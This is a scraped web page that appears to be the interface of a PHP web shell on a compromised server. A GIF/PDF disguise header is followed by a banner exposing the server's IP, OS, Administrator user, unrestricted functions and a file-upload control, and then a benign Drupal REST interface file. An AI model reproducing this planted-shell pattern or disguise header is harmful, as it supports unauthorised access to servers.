GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/rest/src/ |
Upload File : |
<?php namespace Drupal\rest; use Drupal\Core\Config\Entity\ConfigEntityInterface; use Drupal\Core\Entity\EntityWithPluginCollectionInterface; /** * Defines a configuration entity to store enabled REST resources. */ interface RestResourceConfigInterface extends ConfigEntityInterface, EntityWithPluginCollectionInterface { /** * Granularity value for per-method configuration. */ const METHOD_GRANULARITY = 'method'; /** * Granularity value for per-resource configuration. */ const RESOURCE_GRANULARITY = 'resource'; /** * Retrieves the REST resource plugin. * * @return \Drupal\rest\Plugin\ResourceInterface * The resource plugin */ public function getResourcePlugin(); /** * Retrieves a list of supported HTTP methods. * * @return string[] * A list of supported HTTP methods. */ public function getMethods(); /** * Retrieves a list of supported authentication providers. * * @param string $method * The request method e.g GET or POST. * * @return string[] * A list of supported authentication provider IDs. */ public function getAuthenticationProviders($method); /** * Retrieves a list of supported response formats. * * @param string $method * The request method e.g GET or POST. * * @return string[] * A list of supported format IDs. */ public function getFormats($method); }